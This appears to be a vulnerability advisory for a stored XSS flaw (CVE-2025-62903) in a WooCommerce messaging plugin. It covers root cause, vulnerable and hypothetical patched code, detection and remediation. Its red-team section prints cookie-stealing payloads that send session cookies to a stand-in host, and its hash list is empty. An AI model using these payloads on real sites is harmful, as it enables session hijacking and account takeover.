CVE-2025-62903
Executive Summary
CVE-2025-62903 is a Stored Cross-Site Scripting (XSS) vulnerability in the WPC Smart Messages for WooCommerce WordPress plugin, developed by WPClever. The vulnerability exists in versions up to and including 4.2.8. An authenticated attacker with at least Contributor-level privileges can inject malicious JavaScript into the plugin’s message fields. When an administrator or other user views the affected messages, the script executes in their browser session, potentially leading to session hijacking, credential theft, or defacement.
This vulnerability is specific to the WordPress ecosystem and does not involve the underlying web server (Apache/Nginx). The plugin fails to properly sanitize user-supplied input before storing it in the database and later rendering it in the admin dashboard.

Supply Chain & Package Security
This is a WordPress plugin distributed via the official WordPress plugin repository and third-party marketplaces. Users should verify the integrity of the plugin package by checking the plugin’s checksum against the WordPress.org API. The lack of an official patch increases supply chain risk, as users may be forced to apply manual mitigations or switch to alternative plugins.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
- Base Score: 6.5 (Medium)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (Contributor)
- User Interaction: Required (Admin viewing messages)
- Scope: Changed
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: Low
Threat Level: Medium. Exploitation requires authenticated access and user interaction, but the stored XSS can lead to privilege escalation if an admin’s session is hijacked.
Deep Dive & Mechanics
The vulnerability resides in the plugin’s message creation functionality. The plugin stores user-supplied message content in the wp_postmeta table without proper sanitization or output encoding. When the admin views the “Smart Messages” list or previews a message, the stored payload is rendered in the browser without escaping, allowing arbitrary JavaScript execution.
Root Cause: The plugin uses echo $message_content; or similar unsanitized output functions instead of esc_html() or wp_kses_post().
Attack Flow:
- Attacker logs in as a Contributor.
- Attacker creates a new smart message with a malicious payload:
<script>alert(document.cookie)</script>. - Admin navigates to the Smart Messages admin page.
- The payload executes in the admin’s browser, potentially allowing the attacker to create new admin users or exfiltrate session tokens.
Vulnerable vs. Patched Code
Vulnerable Code (v4.2.8):
// In admin/class-wpc-smart-messages-admin.php
function display_message_content($message_id) {
$content = get_post_meta($message_id, 'message_content', true);
echo $content; // No sanitization
}
Patched Code (Hypothetical):
function display_message_content($message_id) {
$content = get_post_meta($message_id, 'message_content', true);
echo esc_html($content); // Proper output encoding
}
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- WordPress instance with WPC Smart Messages <= 4.2.8
- Contributor-level account credentials
Exploit Steps:
- Log in as Contributor.
- Navigate to
WooCommerce > Smart Messages. - Click “Add New” and inject the following payload into the message content field:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Save the message.
- Wait for an admin to view the messages list or preview the message.
Alternative Payload (Session Hijacking):
<img src=x onerror="document.location='https://attacker.com/steal?cookie='+document.cookie">
Blue Team (Detection & Hardening)
Detection:
- Monitor for unusual POST requests to
/wp-admin/admin-ajax.phpwith actionwpc_smart_messages_save. - Look for base64-encoded or obfuscated JavaScript in message content fields.
Hardening:
- Apply a Web Application Firewall (WAF) rule to block
<script>tags in POST data. - Restrict Contributor roles from creating smart messages if not needed.
- Use a WordPress security plugin to enforce output encoding.
Indicators of Compromise (IOCs)
- File Hashes (v4.2.8):

Remediation & Mitigation
Immediate Actions:
- Disable the plugin until a patch is released.
- Restrict Contributor roles from accessing the Smart Messages admin page using a role editor plugin.
- Manually sanitize output by adding
esc_html()to the plugin’s template files (if you have development access).
Long-Term Fix:
- Monitor the WPClever website or WordPress plugin repository for an official update.
- Replace the plugin with an alternative that properly sanitizes input/output.
Workaround:
- Add the following to your theme’s
functions.phpto force output encoding:add_filter('wpc_smart_messages_message_content', 'esc_html');
